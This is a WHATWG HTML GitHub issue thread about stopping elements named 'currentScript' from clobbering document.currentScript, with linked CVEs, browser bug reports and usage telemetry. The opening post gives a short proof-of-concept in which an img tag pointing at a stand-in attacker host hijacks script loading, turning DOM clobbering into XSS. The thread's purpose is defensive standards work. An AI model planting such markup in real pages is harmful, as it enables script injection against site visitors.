html icon indicating copy to clipboard operation
html copied to clipboard

Prevent currentScript from being overridden on document via name=''

Open juj opened this issue 1 year ago • 14 comments

What is the issue with the HTML Standard?

It has been reported that an attacker that has DOM clobbering powers (weak), can potentially escalate it to XSS attack (stronger).

Several public CVEs have been reported, e.g.

https://vulert.com/vuln-db/CVE-2024-45389 https://github.com/advisories/GHSA-gcx4-mw62-g8wm https://nvd.nist.gov/vuln/detail/CVE-2024-45812 https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

These all revolve around the fact that

<html><body>
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
</script></body></html>

That is, if attacker has the power to inject a DOM element with name='currentScript' (like add an image in a forum in an unsafely implemented manner), and if the site then uses document.currentScript.src to infer what the path to the current script is, to load another script relative to it, an attacker has the capability to elevate their DOM clobber into a XSS opportunity.

I raised this in https://github.com/whatwg/dom/issues/1315 where it was closed as duplicate of https://github.com/whatwg/html/issues/2212.

The ticket https://github.com/whatwg/html/issues/2212 discussed a general opt-out solution, though it feels that a) a solution to this security aspect should not be opt-out, and b) dealing with the specific pattern of document.currentScript alone would be worth it, as that would plug that whole class of CVEs linked above from being able to occur.

Progress in https://github.com/whatwg/html/issues/2212 has been slow due to concerns of site breakage. I think it would be safe to argue that preventing <img name='currentScript' src='http://bad.attacker.site.com/foo.js'> from overwriting document.currentScript, i.e. handling the overwrite of name='currentScript' alone should not have these backwards compatibility concerns of site breakage, and would be possible to be undertaken separately from https://github.com/whatwg/html/issues/2212, which is currently in the progress of acquiring user statistics?

Reading the linked CVEs, it looks like that would cover all the CVEs above, and stop any future CVEs from this category from being possible. It would also prevent weird interactions in downstream libraries, like https://github.com/emscripten-core/emscripten/pull/22688, from needing to take place.

Would it be ok to blacklist name='currentScript' on its own from replacing document.currentScript? What do you think?

juj avatar Oct 08 '24 11:10 juj

currentScript currently only works for classic scripts (i.e., not for module scripts) and only as long as they are found in the document tree (i.e., not when they are in a shadow tree).

While I suppose we could add a special case for it in Document object's named getter, it's not really an API that universal scripts ought to be using anyway. I guess I wouldn't oppose some kind of push for this, but it's not clear to me it's worth the effort.

annevk avatar Oct 08 '24 12:10 annevk

document.currentScript presents in the outputs of widely used bundle tools like: webpack / rollup / vite / rspack / tsup / modern.js / umi, and wasm compiling and packing tools like emscripten / wasm-bindgen. I believe many can benefit if this is prevented from the source.

Sec-ant avatar Oct 08 '24 12:10 Sec-ant

it's not really an API that universal scripts ought to be using anyway

we use it a lot in PyScript, as scripts there (the only valid data node we could use 'cause Custom Elements won't work the same) might need it, so we need to grab it and forward it to the underlying WASM interpreter.

All I am saying is that use cases for it are more common than you think (or measure, as I think you measure only JS code and not WASM related code too).

WebReflection avatar Oct 08 '24 14:10 WebReflection

on a side note, we also run WASM in workers where document makes no sense (we provide it) and currentScript makes even less sense ... so maybe there's something to think about in the emscripten and wasm-bindgen side of affairs, happy to help there if needed.

WebReflection avatar Oct 08 '24 14:10 WebReflection

it's not really an API that universal scripts ought to be using anyway

Looking at MDN: document.currentScript there are no markings of the API being deprecated or obsoleted. This comment is the first I hear about this sentiment. If using document.currentScript is outdated, there is no way today for developers to discover that they should no longer be using it. Especially if we are calling it outdated on grounds of potential security problems, such a conclusion should be widely publicized in the spec and/or MDN as a deprecation warning.

Also, using modules is not a drop-in replacement to many projects, but can require extensive code refactoring - so getting developers to migrate is not a quick feat.

it's not clear to me it's worth the effort

In the infosec community, it looks like publishing CVEs based on this <img name='currentScript'> privilege escalation is fair game, and based on the closing notes in this comment ("while checking [CVE] alerts across my projects"), I get an impression that automated JS code security scanners flag uses of document.currentScript.src because of this DOM clobbering pattern. It was clearly worth to them, and I do think that the common "zero-value CVE reports" argument does not apply here. (the behavior was highly surprising when I first read about this)

In that light, I think it would be worthwhile for WhatWG to tend to this, rather than leaving it to all site developers and the above listed middleware vendors to individually learn about and argue if it's a legitimate thing or not. The downsides seem practically nonexistent?

juj avatar Oct 08 '24 14:10 juj

I'm not opposed to someone driving this. https://whatwg.org/working-mode#changes describes the rough process. If there is someone willing to take this on (and this can be literally anyone, including everyone who participated in this thread thus far; the WHATWG community consists of everyone who participates in the development of its standards after all) I suppose we could label this issue agenda+ to gauge implementer interest.

@whatwg/documentation perhaps it's worthwhile documenting that currentScript also does not work inside of shadow trees. And that it has generally fallen out of favor as per the note in the HTML Standard and https://github.com/whatwg/html/issues/1013.

annevk avatar Oct 08 '24 15:10 annevk

If there is someone willing to take this on I suppose we could label this issue agenda+ to gauge implementer interest.

it's a security concern and a source of doom for the current state of the modern Web so I hope someone will try to fix it sooner than later.

WebReflection avatar Oct 08 '24 16:10 WebReflection

I have a little bit of experience for creating WPT tests from the interaction we had before. To get going, I added a WPT test at https://github.com/web-platform-tests/wpt/pull/48536 . Of course to be merged only after implementers agree.

juj avatar Oct 09 '24 09:10 juj

I tried to search where in the HTML spec the connection of DOM element name='foo' -> document.foo is made. I found only this: https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#naming-form-controls:-the-name-attribute

though that relates to forms, and does not mention the document object.

Should the HTML spec acquire some kind of wording about this somewhere?

juj avatar Oct 09 '24 09:10 juj

Filed implementation bugs at

  • Chrome: https://issues.chromium.org/issues/372269621
  • Firefox: https://bugzilla.mozilla.org/show_bug.cgi?id=1923580
  • Safari: https://bugs.webkit.org/show_bug.cgi?id=281129

juj avatar Oct 09 '24 09:10 juj

Thanks @juj for taking this on! The named getter algorithm for Document objects is defined here (getter object (DOMString name); is the relevant bit in IDL): https://html.spec.whatwg.org/multipage/dom.html#dom-document-nameditem

annevk avatar Oct 09 '24 11:10 annevk

Blocklisting only currentScript name would help with this one particular case. But if sites let one to include unsanitized html, one could still override many other features on document, and thus break the page. This is a well known, old issue, and I'd expect sites to sanitize the included html.

But it would be great if this could be fixed in some generic way. I think we need first data about how much sites rely on https://html.spec.whatwg.org/multipage/dom.html#dom-document-nameditem Or maybe https://chromestatus.com/metrics/feature/timeline/popularity/4872 is about that? That seems quite low (There is also https://chromestatus.com/metrics/feature/timeline/popularity/4873) One problem changing the current setup is that if one adds new properties to Document, those might break existing sites.

smaug---- avatar Oct 09 '24 13:10 smaug----

Blocklisting only currentScript name would help with this one particular case.

Yes, that is right. Originally I too asked "let's fix all the cases" in https://github.com/whatwg/dom/issues/1315, but @annevk pointed out such a request was duplicate of https://github.com/whatwg/html/issues/2212 , which a) has been open since 2016 with no urgency, b) has a concern of breaking compatibility with existing sites, and c) was raised with no knowledge of being a security related request.

I'd expect sites to sanitize the included html.

Well, yes, after I saw this behavior: me too. I've been developing HTML/JS for well more than a decade and only learned about this behavior this week. When I did, I also expected that browsers would have sane behavior out of the box, i.e. that they would not allow document.currentScript to be overridden like this; but expecting others to do have done the sane thing doesn't always work out.

Given that the CVEs keep on coming, it does not seem that asking developers to sanitize would be the best approach (there will always be some who fail to do it, just like browser vendors have failed here), since it means that every developer has to learn about this issue independently, making it harder to write safe code out of the box.

This is a well known, old issue

I think this makes the problem more pertinent to solve, instead of diminishing/dismissing the trouble. Enough is enough?

it would be great if this could be fixed in some generic way

When I look at the CVEs, they all hinge on this one pattern that document.currentScript.src happens to collide with the .src property when a <img name='currentScript src='...'> is added. So in order to mute the CVEs from being possible, it is enough to get this document.currentScript hole plugged.

one could still override many other features on document, and thus break the page.

That is correct. In https://github.com/emscripten-core/emscripten/pull/22688#issuecomment-2399238660 I examined all the various ways that Emscripten content for example could be broken by using other names. But when looking at all the other names, there does not seem to exist a good way to escalate attack vectors. That is, the DOM clobering attack privilege fizzles to a Denial of Service attack, which is arguably a lesser problem than a XSS scripting attack, which all seems to revolve around document.currentScript.src. So I think tending to this one property as a special case does have value, and it can avoid the statistics gathering problem of https://github.com/whatwg/html/issues/2212.

juj avatar Oct 09 '24 14:10 juj

I think it's worth investigating if it's possible to change this so that standard properties on document don't get shadowed.

To that end I queried httparchive to see which pages trigger the DOMClobberedShadowedDocumentPropertyAccessed use counter in Chrome, and then parsed those pages to find which properties used in the relevant elements' name and id attributes.

Findings:

There are 197 matching pages in the httparchive dataset (total number of pages is 12,098,307).

The name/id values and the number of pages with that value:

Name/ID Page Count
hidden 38
body 29
cookie 26
title 25
head 5
links 5
domain 5
images 4
all 2
forms 1

See https://github.com/zcorpan/document-clobbering-props for the methodology (I used chatgpt to help write the scripts) and https://github.com/zcorpan/document-clobbering-props/blob/main/results_categorized.csv for further compat analysis of individual pages. For example, for pages that have <form name=cookie>, do they really expect document.cookie to return the form element?

zcorpan avatar Oct 10 '24 08:10 zcorpan

Today I analyzed the affected pages found in httparchive (that hit the relevant chrome use counter). See https://docs.google.com/spreadsheets/d/1ATQUNv8_2B3S69zSfNWLcz44G-vY1rJ1wKIYKBJ0nBQ/edit?usp=sharing

Summary: Most pages expect non-clobbering (50 pages) or are not affected (85 pages), 5 pages rely on clobbering (or both rely on clobbering and elsewhere expect non-clobbering). Changing this for all standard properties on document would break a few pages but fix an order of magnitude more pages to match expectations.

Details below...

Pages expecting non-clobbering

  • hidden
    • 10 pages use document.hidden for the visibility API, but also have an iframe or form with name=hidden.
  • body
    • 26 pages use document.body expecting a body element but also have an iframe with name=body
  • title
    • 6 pages use document.title expecting the page title but also have some element with name=title
  • head
    • 5 pages with document.head expect to get the head element but also have a form or img element with name=head
  • all
    • 2 pages use document.all for browser detection (modern browsers make it look like undefined), but name=all reverses the result.
  • forms
    • 1 page uses document.forms[0] expecting the first form in the forms collection, but has name=forms on a form (so an input element is returned instead).

Pages relying on clobbering

  • cookie
    • 2 pages use document.cookie.submit().
  • title
    • 1 page uses document.title.src=TopImg()
  • links
    • 2 pages for accessing an img or a form, respectively

N/A pages with notes

  • cookie
    • 23 pages have <form name=cookie> but only load the script with document.cookie after accepting cookies, at which point the form is gone, so are technically not affected by the clobbering.

zcorpan avatar Apr 09 '25 23:04 zcorpan

5 pages out of 12,098,307 is ~0.00004%.

zcorpan avatar Apr 09 '25 23:04 zcorpan

we cannot analyze this from static content and like I've said already in here https://github.com/whatwg/html/issues/10687#issuecomment-2399959583 we use this a lot when our own script lazy-loads foreign WASM based interpreters where the document.currentScript on bootstrap needs to be patched at runtime.

If we cannot temporarily override the current reference this will be a breaking change for our project and our users + you won't likely find PyScript .com apps in that analysis + it's entirely runtime behavior, not something you'll find within the HTML or within the JS because it's Python driven (in our case).

Reading again the OP, it's possible to grab the current script via querySelector too, analyze its content and/or src and create a sibling, meaning this won't likely fix the evil attack issue, it just makes it slightly harder but again, if we cna still temporarily patch document.currentScript then we're good, otherwise please consider projects trusting and using this property as it is since long time ago, thank you.

WebReflection avatar Apr 10 '25 09:04 WebReflection

@WebReflection document.currentScript will continue to work. What will stop working is making <img name=currentScript> make document.currentScript return the img element instead of the current script.

I assume you're not relying on the latter?

zcorpan avatar Apr 10 '25 17:04 zcorpan

@zcorpan correct, we don't want that to happen neither, so apologies but this (very old topic) just landed again and I wanted to be sure it wouldn't break our own expectations and that seems to be the case, it actually makes our own expectations more reliable, once fixed, so ... thank you.

WebReflection avatar Apr 10 '25 19:04 WebReflection

I added some telemetry to Firefox 140, the following results are for Beta however. I am going to update this with the release numbers in a week or so. Overall the numbers are extremely low. There are some caveats though: We only count properties that WebIDL defines on document (currently excluding event handler content attributes) and I seemingly forgot to include properties on Object.prototype.

property # pageloads
hidden 1,131
body 669
links 236
all 150
head 61
forms 15
cookie 14
title 9
domain 7
scripts 3
dir 2
children 1

For specification purposes, does it make sense to use a fixed list of standard properties that we don't allow being clobbered?

evilpie avatar Jun 25 '25 09:06 evilpie

Ideally we would prevent clobbering of all standard properties in the prototype chain. But we can start with a fixed list if that is what we have data for and want to move forward with for now.

zcorpan avatar Jun 26 '25 14:06 zcorpan

Here are the results for Firefox release.

property # pageloads
hidden 437,947
body 210,672
links 91,266
head 33,237
forms 20,745
title 14,472
all 9,494
cookie 7,091
scripts 1,483
domain 1,072
images 857
timeline 654
dir 547
referrer 71
URL 58
plugins 36
fullscreen 33
fonts 26
implementation 22
defaultView 6
children 6
contentType 3
anchors 1
currentScript 1
applets 1

I find it very curious that according to this data DOM clobbering attacks using currentScript basically don't exist in the real world. These numbers might look big, but we have overall pageloads in the order of billions.

I think I am going to try and block clobbering for all WebIDL properties in Firefox Nightly. (And start collecting data on Object.prototype properties)

evilpie avatar Jul 08 '25 13:07 evilpie

The latest Firefox Nightly has an implementation of this, thanks to @evilpie. currentScript seems to be particularly well-suited for removal, according to our usage telemetry. https://bugzilla.mozilla.org/show_bug.cgi?id=1976243

mozfreddyb avatar Jul 10 '25 08:07 mozfreddyb

@mozfreddyb The change in Nightly is blocking shadowing of all properties, right? Not only currentScript?

securityMB avatar Jul 14 '25 09:07 securityMB

@mozfreddyb The change in Nightly is blocking shadowing of all properties, right? Not only currentScript?

This is basically correct. For now, I basically just decided to block the clobbering of everything declared as attribute in WebIDL. So title (and currentScript etc.), but not createElement(). I did this mostly out of memory/speed concerns, while this is still an experiment. I suspect methods are less useful as a target for DOM clobbering, but I am not opposed to blocking all properties just for consistency anyway.

evilpie avatar Jul 14 '25 09:07 evilpie